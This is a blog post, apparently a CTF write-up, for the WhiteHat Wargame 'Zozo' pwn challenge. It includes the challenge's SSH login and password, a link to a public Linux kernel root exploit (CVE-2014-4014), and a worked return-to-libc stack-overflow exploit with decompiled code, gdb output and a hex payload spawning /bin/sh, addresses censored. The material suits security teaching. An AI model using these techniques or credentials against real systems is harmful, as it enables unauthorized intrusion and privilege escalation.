{"id":13101,"date":"2016-07-01T17:58:04","date_gmt":"2016-07-01T15:58:04","guid":{"rendered":"http:\/\/www.codilime.com\/?p=13101"},"modified":"2016-12-01T22:14:06","modified_gmt":"2016-12-01T21:14:06","slug":"whitehat11-zozo","status":"publish","type":"post","link":"https:\/\/codisec.com\/whitehat11-zozo\/","title":{"rendered":"Zozo"},"content":{"rendered":"<p>Link: <a href=\"https:\/\/wargame.whitehat.vn\/Challenges\/DetailContest\/136\">https:\/\/wargame.whitehat.vn\/Challenges\/DetailContest\/136<\/a><br \/>\nAuthor: WhiteHat Wargame<br \/>\nPoints: 100<br \/>\nCategory: pwn<\/p>\n<h2>Description<\/h2>\n<blockquote><p>ssh pwnguest@118.70.80.143 1094<br \/>\n68bZ$wRn<\/p><\/blockquote>\n<h3>Resources<\/h3>\n<ul style=\"padding-left: 30px;\">\n<li><a href=\"http:\/\/codisec.com\/wp-content\/uploads\/2016\/07\/signal.gz\">the binary<\/a> (gzipped)<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>part 1<\/h3>\n<p>We have been given shell access to a remote machine. The <code>pwnguest<\/code> user was extremely limited &#8211; no access to anything except the home directory. There lied two particularly interesting files:<\/p>\n<ul style=\"padding-left: 30px;\">\n<li><code>flag.txt<\/code>, which was owned by <code>root<\/code> and readable only by <code>pwnreader<\/code> group<\/li>\n<li>and <code>signal<\/code>, which was executable by the current user, owned by <code>pwnreader<\/code> group and had <code>SGID<\/code> set.<\/li>\n<\/ul>\n<p>This has given a clear idea what was the intended solution to the task.<\/p>\n<p>However, &#8230;<\/p>\n<h2>Broken task<\/h2>\n<p>The machine was running an outdated kernel, <code>Linux ubuntu 3.13.0-32-generic<\/code> be exact, with a known privilege escalation exploit. Here are some resources on this topic:<\/p>\n<ul style=\"padding-left: 30px;\">\n<li><a target=\"_blank\" href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-4014\">cve.mitre.org CVE-2014-4014<\/a>,<\/li>\n<li><a target=\"_blank\" href=\"http:\/\/www.cvedetails.com\/cve\/CVE-2014-4014\/\">cvedetails CVE-2014-4014<\/a>,<\/li>\n<li><a target=\"_blank\" href=\"http:\/\/git.kernel.org\/cgit\/linux\/kernel\/git\/torvalds\/linux.git\/commit\/?id=23adbe12ef7d3d4195e80800ab36b37bee28cd03\">fix-commit<\/a>,<\/li>\n<li><a target=\"_blank\" href=\"https:\/\/gist.github.com\/infoslack\/8606734bd02a6ab3e3ea\">exploit<\/a>.<\/li>\n<\/ul>\n<h3>The not necessarily intended solution<\/h3>\n<p>The easiest solution was to obtain a root shell using the aforementioned public exploit. The server has quickly been torn down. This gave an irresistable impression that, in fact one of the teams did obtain a root shell and they have also decided to sabotage the contest and took the machine down, preventing the other participants from scoring points.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>part 2 &#8211; the intended solution<\/h3>\n<p>Because the user available was extremely limited &#8211; no access to <code>\/dev<\/code> (and therefore <code>\/dev\/null<\/code>), <code>scp<\/code> was going mad. This has not been a serious limitation, the code for this task could be downloaded using a workaround, for example:<br \/>\n<code>ssh -p1094 -lpwnguest 118.70.80.143 dd if=\/home\/ubuntu\/signal &gt;\/tmp\/signal<\/code><\/p>\n<p>The file is 32-bit ELF executable binary:<br \/>\n<code>signal: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, BuildID[sha1]=cb0c7cda48b50c413181c4641fe98efe840f3364, not stripped<\/code><\/p>\n<p>When executed, it installs a custom SIGINT handler, runs several threads, asks for input and when signalled with INT, sleeps, does some string operations and prints some garbage.<\/p>\n<pre class=\"nums:false\">__libc_start_main(0x80488a4, 1, 0xffbb4ee4, 0x80489b0 \r\nsignal(SIGINT, 0x804878d)                        = 0\r\nputs(\"&gt;&gt; Enter your name:\")                      = 20\r\npthread_create(0x8c49008, 0, 0x8048883, 0)       = 0\r\npthread_create(0x8c4900c, 0, 0x8048883, 0)       = 0\r\npthread_create(0x8c49010, 0, 0x8048883, 0)       = 0\r\npthread_create(0x8c49014, 0, 0x8048883, 0)       = 0\r\npthread_create(0x8c49018, 0, 0x8048883, 0)       = 0\r\npthread_join(0xf758bb40, 0, 0x8048883, 0)        = 0\r\npthread_join(0xf6d8ab40, 0, 0x8048883, 0 \r\n--- SIGINT (Interrupt) ---\r\nputs(\"First Caught signal, coming out.\"...)      = 35\r\nsleep(3)                                         = 0\r\nprintf(\"\\nGoodbye\")                              = 8\r\nstrlen(\"aaa\")                                    = 3\r\nstrncpy(0xffbb46c6, \"aa\", 2)                     = 0xffbb46c6\r\nstrtol(0xffbb46c6, 0, 16, 50)                    = 170\r\nputchar(170, 0, 16, 50)                          = 170\r\nputchar(170, 0, 16, 50)                          = 170\r\nprintf(\"%d %c\\n\", 170, '\\252')                   = 6\r\nstrlen(\"aaa\")                                    = 3\r\nstrcpy(0xffbb46c8, \"\\252\")                       = 0xffbb46c8\r\nprintf(\"\\252\")                                   = 1\r\nputs(\"\\n----  Caught signal SIGINT, com\"...)     = 43\r\n+++ killed by SIGKILL +++<\/pre>\n<p><strong>Simplified<\/strong> C pseudocode for the signal handler looks like:<\/p>\n<pre class=\"toolbar:1 lang:c mark:18,21,22\" title=\"signal handler\">void signal_handler() {\r\n  __int32 _not_important_1;\r\n  char _not_important_2;\r\n  int _not_important_3;\r\n  size_t _not_important_4;\r\n  char src[32];\r\n  char dest;\r\n  char format;\r\n  int c;\r\n  size_t i;\r\n\r\n  puts(\"First Caught signal, coming out...\");\r\n  sleep(3);\r\n  printf(\"\\nGoodbye\");\r\n  for ( i = 0; i &lt; strlen(name) * 2; ++i ) {\r\n    strncpy(&amp;dest, (const char *)(2 * i + name), 2);\r\n    c = strtol(&amp;dest, 0, 16);\r\n    src[i] = putchar(c);\r\n    printf(\"%d %c\\n\", c, putchar(c));\r\n  }\r\n  strcpy(&amp;format, src);\r\n  printf(&amp;format);\r\n  puts(\"\\n----  Caught signal SIGINT, coming out...\");\r\n}<\/pre>\n<p>It is fairly easy to spot several flaws in this function.<\/p>\n<ol style=\"padding-left: 30px;\">\n<li>At line <code>22<\/code> there is a <a target=\"_blank\" href=\"https:\/\/www.owasp.org\/index.php\/Format_string_attack\">print format string vulnerability<\/a> possible.<\/li>\n<li>At line <code>21<\/code> there is a stack buffer overflow vulnerability.<\/li>\n<li>At line <code>18<\/code> there is another stack buffer vulnerability.<\/li>\n<\/ol>\n<p>We have decided to exploit the third option, however the second one overwrites the stack with shared data. Therefore a controlled user input must be safeguarded with a <code>NULL<\/code> terminating byte.<\/p>\n<p>The binary has a non-executable stack and no canaries.<\/p>\n<pre class=\"nums:false\">CANARY    : disabled\r\nFORTIFY   : disabled\r\nNX        : ENABLED\r\nPIE       : disabled\r\nRELRO     : Partial<\/pre>\n<p>Therefore it is not possible to inject shellcode onto the stack.<\/p>\n<p>Searching the binary <code>.rel.plt<\/code> section for possible exploit entry points with <code>readelf<\/code><\/p>\n<pre class=\"nums:false lang:less\">Relocation section '.rel.plt' at offset 0x4dc contains 16 entries:\r\n Offset     Info    Type            Sym.Value  Sym. Name\r\n0804a00c  00000207 R_386_JUMP_SLOT   00000000   printf\r\n0804a010  00000307 R_386_JUMP_SLOT   00000000   signal\r\n0804a014  00000407 R_386_JUMP_SLOT   00000000   sleep\r\n0804a018  00000507 R_386_JUMP_SLOT   00000000   strcpy\r\n0804a01c  00000607 R_386_JUMP_SLOT   00000000   malloc\r\n0804a020  00000707 R_386_JUMP_SLOT   00000000   puts\r\n0804a024  00000807 R_386_JUMP_SLOT   00000000   strerror\r\n0804a028  00000907 R_386_JUMP_SLOT   00000000   __gmon_start__\r\n0804a02c  00000a07 R_386_JUMP_SLOT   00000000   strlen\r\n0804a030  00000b07 R_386_JUMP_SLOT   00000000   __libc_start_main\r\n0804a034  00000c07 R_386_JUMP_SLOT   00000000   putchar\r\n0804a038  00000d07 R_386_JUMP_SLOT   00000000   strncpy\r\n0804a03c  00000f07 R_386_JUMP_SLOT   00000000   pthread_join\r\n0804a040  00001007 R_386_JUMP_SLOT   00000000   __isoc99_scanf\r\n0804a044  00001107 R_386_JUMP_SLOT   00000000   pthread_create\r\n0804a048  00001307 R_386_JUMP_SLOT   00000000   strtol<\/pre>\n<p>yields nothing of interest (no <code>system<\/code> or <code>execve<\/code>).<\/p>\n<p>So the last resort will be a classic <a target=\"_blank\" href=\"https:\/\/en.wikipedia.org\/wiki\/Return-to-libc_attack\">return to libc<\/a> attack.<\/p>\n<p>To perform it<\/p>\n<pre class=\"nums:false\">Dynamic section at offset 0xf0c contains 25 entries:\r\n  Tag        Type                         Name\/Value\r\n 0x00000001 (NEEDED)                     Shared library: [libpthread.so.0]\r\n 0x00000001 (NEEDED)                     Shared library: [libc.so.6]\r\n 0x0000000c (INIT)                       0x804855c\r\n 0x0000000d (FINI)                       0x8048a24\r\n 0x00000019 (INIT_ARRAY)                 0x8049f00\r\n 0x0000001b (INIT_ARRAYSZ)               4 (bytes)\r\n 0x0000001a (FINI_ARRAY)                 0x8049f04\r\n 0x0000001c (FINI_ARRAYSZ)               4 (bytes)\r\n 0x6ffffef5 (GNU_HASH)                   0x80481ac\r\n 0x00000005 (STRTAB)                     0x804831c\r\n 0x00000006 (SYMTAB)                     0x80481cc\r\n 0x0000000a (STRSZ)                      300 (bytes)\r\n 0x0000000b (SYMENT)                     16 (bytes)\r\n 0x00000015 (DEBUG)                      0x0\r\n 0x00000003 (PLTGOT)                     0x804a000\r\n 0x00000002 (PLTRELSZ)                   128 (bytes)\r\n 0x00000014 (PLTREL)                     REL\r\n 0x00000017 (JMPREL)                     0x80484dc\r\n 0x00000011 (REL)                        0x80484d4\r\n 0x00000012 (RELSZ)                      8 (bytes)\r\n 0x00000013 (RELENT)                     8 (bytes)\r\n 0x6ffffffe (VERNEED)                    0x8048474\r\n 0x6fffffff (VERNEEDNUM)                 2\r\n 0x6ffffff0 (VERSYM)                     0x8048448\r\n 0x00000000 (NULL)                       0x0<\/pre>\n<p>both <code>libc<\/code> and <code>libpthread<\/code> from the original system will be required(Unfortunately the system was and is down, so we were unable to retrieve the libraries).<\/p>\n<p>The <code>signal<\/code> function actually loops through the given <code>name<\/code>, parsing two characters at a time as a hexadecimal value and writes it into a buffer on the stack, without checking for the buffer length. So the goal is to provide enough data to fill the buffer, overflow it and build a valid stack frame for a <code>libc<\/code> function that executes shell, <code>system@glibc<\/code> in this case, but, for example, <code>execve<\/code> would also work.<\/p>\n<p>The required input is:<code>4142434445464748495041424344454647484950414243444546474849504142434400<\/code>which becomes<\/p>\n<pre class=\"nums:false\">ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCD[NULL]\r\n  ^      ^\r\n  |______|<\/pre>\n<p>on the stack. Characters from the first <code>C<\/code> to <code>J<\/code> are the addresses of <code>system@glibc<\/code> and the pointer to it&#8217;s argument &#8211; <code>\"\/bin\/sh\"<\/code>.<\/p>\n<p>To retrieve the aforementioned addresses <code>gdb<\/code> can be used:<\/p>\n<pre class=\"lang:sh nums:false\">gdb-peda$ file signal\r\nReading symbols from signal...(no debugging symbols found)...done.\r\ngdb-peda$ start\r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"\/lib\/x86_64-linux-gnu\/libthread_db.so.1\".\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x1 \r\nEBX: 0xf7faf000 --> 0x1a6da8 \r\nECX: 0xc9045fc9 \r\nEDX: 0xffffd634 --> 0xf7faf000 --> 0x1a6da8 \r\nESI: 0x0 \r\nEDI: 0x0 \r\nEBP: 0xffffd608 --> 0x0 \r\nESP: 0xffffd608 --> 0x0 \r\nEIP: 0x80488a7 (<main+3>:       and    esp,0xfffffff0)\r\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80488a3 <doit+32>: ret    \r\n   0x80488a4 <main>:    push   ebp\r\n   0x80488a5 <main+1>:  mov    ebp,esp\r\n=> 0x80488a7 <main+3>:  and    esp,0xfffffff0\r\n   0x80488aa <main+6>:  sub    esp,0x20\r\n   0x80488ad <main+9>:  mov    DWORD PTR [esp+0x4],0x804878d\r\n   0x80488b5 <main+17>: mov    DWORD PTR [esp],0x2\r\n   0x80488bc <main+24>: call   0x80485a0 <signal@plt>\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd608 --> 0x0 \r\n0004| 0xffffd60c --> 0xf7e21ad3 (<__libc_start_main+243>:       mov    DWORD PTR [esp],eax)\r\n0008| 0xffffd610 --> 0x1 \r\n0012| 0xffffd614 --> 0xffffd6a4 --> 0xffffd7f6 (\"\/home\/u\/signal\")\r\n0016| 0xffffd618 --> 0xffffd6ac --> 0xffffd805 (\"LC_PAPER=C.UTF-8\")\r\n0020| 0xffffd61c --> 0xf7feacca (add    ebx,0x12336)\r\n0024| 0xffffd620 --> 0x1 \r\n0028| 0xffffd624 --> 0xffffd6a4 --> 0xffffd7f6 (\"\/home\/u\/signal\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nTemporary breakpoint 1, 0x080488a7 in main ()\r\ngdb-peda$ p\/x &system\r\n$1 = 0xcensored\r\ngdb-peda$ find \/bin\/sh\r\nSearching for '\/bin\/sh' in: None ranges\r\nFound 1 results, display max 1 items:\r\nlibc : 0xCensored (\"\/bin\/sh\")\r\n<\/pre>\n<p>The architecture is <code>x86<\/code> and therefore pointers are in <em>little endian<\/em> convention, so the addresses must be written <strong>in reverse<\/strong>.<\/p>\n<p>Finally, the exploit is:<code>4142censoredCensored41424344454647484950414243444546474849504142434400<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Link: https:\/\/wargame.whitehat.vn\/Challenges\/DetailContest\/136 Author: WhiteHat Wargame Points: 100 Category: pwn Description ssh pwnguest@118.70.80.143 1094 68bZ$wRn Resources the binary (gzipped) Walkthrough part 1 We have been given shell access to a remote machine. The pwnguest user was extremely limited &#8211; no access<span class=\"ellipsis\">&hellip;<\/span> <a href=\"https:\/\/codisec.com\/whitehat11-zozo\/\"><\/p>\n<div class=\"read-more\">Read more &#8250;<\/div>\n<p><!-- end of .read-more --><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[13],"tags":[7],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<link rel=\"canonical\" href=\"https:\/\/codisec.com\/whitehat11-zozo\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Zozo - CodiSec\" \/>\n<meta property=\"og:description\" content=\"Link: https:\/\/wargame.whitehat.vn\/Challenges\/DetailContest\/136 Author: WhiteHat Wargame Points: 100 Category: pwn Description ssh pwnguest@118.70.80.143 1094 68bZ$wRn Resources the binary (gzipped) Walkthrough part 1 We have been given shell access to a remote machine. The pwnguest user was extremely limited &#8211; no access&hellip; Read more &#8250;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/codisec.com\/whitehat11-zozo\/\" \/>\n<meta property=\"og:site_name\" content=\"CodiSec\" \/>\n<meta property=\"article:published_time\" content=\"2016-07-01T15:58:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2016-12-01T21:14:06+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\">\n\t<meta name=\"twitter:data1\" content=\"6 minutes\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/codisec.com\/#website\",\"url\":\"https:\/\/codisec.com\/\",\"name\":\"CodiSec\",\"description\":\"PENETRATION TESTING  AND MALWARE ANALYSIS\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/codisec.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/codisec.com\/whitehat11-zozo\/#webpage\",\"url\":\"https:\/\/codisec.com\/whitehat11-zozo\/\",\"name\":\"Zozo - CodiSec\",\"isPartOf\":{\"@id\":\"https:\/\/codisec.com\/#website\"},\"datePublished\":\"2016-07-01T15:58:04+00:00\",\"dateModified\":\"2016-12-01T21:14:06+00:00\",\"author\":{\"@id\":\"https:\/\/codisec.com\/#\/schema\/person\/dcb03d80d18238f7a0337ca696f83bae\"},\"breadcrumb\":{\"@id\":\"https:\/\/codisec.com\/whitehat11-zozo\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/codisec.com\/whitehat11-zozo\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/codisec.com\/whitehat11-zozo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/codisec.com\/\",\"url\":\"https:\/\/codisec.com\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/codisec.com\/whitehat11-zozo\/\",\"url\":\"https:\/\/codisec.com\/whitehat11-zozo\/\",\"name\":\"Zozo\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/codisec.com\/#\/schema\/person\/dcb03d80d18238f7a0337ca696f83bae\",\"name\":\"Micha\\u0142 Soczewka\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/codisec.com\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6aa99c76e1e1efd191a8154a27a4abab?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6aa99c76e1e1efd191a8154a27a4abab?s=96&d=mm&r=g\",\"caption\":\"Micha\\u0142 Soczewka\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/posts\/13101"}],"collection":[{"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/comments?post=13101"}],"version-history":[{"count":3,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/posts\/13101\/revisions"}],"predecessor-version":[{"id":13587,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/posts\/13101\/revisions\/13587"}],"wp:attachment":[{"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/media?parent=13101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/categories?post=13101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/codisec.com\/wp-json\/wp\/v2\/tags?post=13101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}